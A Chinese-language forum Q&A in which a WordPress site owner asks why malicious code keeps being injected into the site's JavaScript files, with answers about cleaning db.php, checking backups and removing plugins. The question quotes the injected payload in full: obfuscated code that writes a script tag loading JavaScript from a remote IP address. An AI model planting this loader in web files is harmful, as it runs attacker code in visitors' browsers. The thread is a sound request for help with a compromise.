wordpress 网站（基于主题）不断被注入恶意代码

Question

我有一个基于主题的 wordpress 网站，但由于过去几天网站插件不起作用，我发现的原因是“.js”扩展文件被注入了恶意代码

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]));

为避免它而采取的措施

• 限制写入文件的权限。
• 阻止ftp被我以外的任何其他ip访问。
• 尝试从整个网站中删除代码。
• 上传备份文件。 但仍然以某种方式代码继续注入几乎所有的javascript文件

Answer 1

您必须找到文件：“db.php”并删除受感染的代码。 同时，您必须删除“.js”文件中感染的所有代码。 https://www.polaris64.net/blog/cyber-security/2017/wordpress-hacks-jquery-js-script-injection

Answer 2

马上，我认为您的备份可能已损坏。 我不知道它是否早于您的感染，但它是需要检查的。 此外，尝试禁用/删除插件——一个可能容易受到攻击或被感染。 查看 db.php 和您的 .js 文件中的受感染代码并将其删除。

如果您的备份不好，您将不得不通过所有代码来找到坏的位并删除它们。 或者，如果您可以花时间并拥有干净的源内容，则可以清除整个内容并重新开始。 这是一个可怕的想法，但有时这就是解决办法。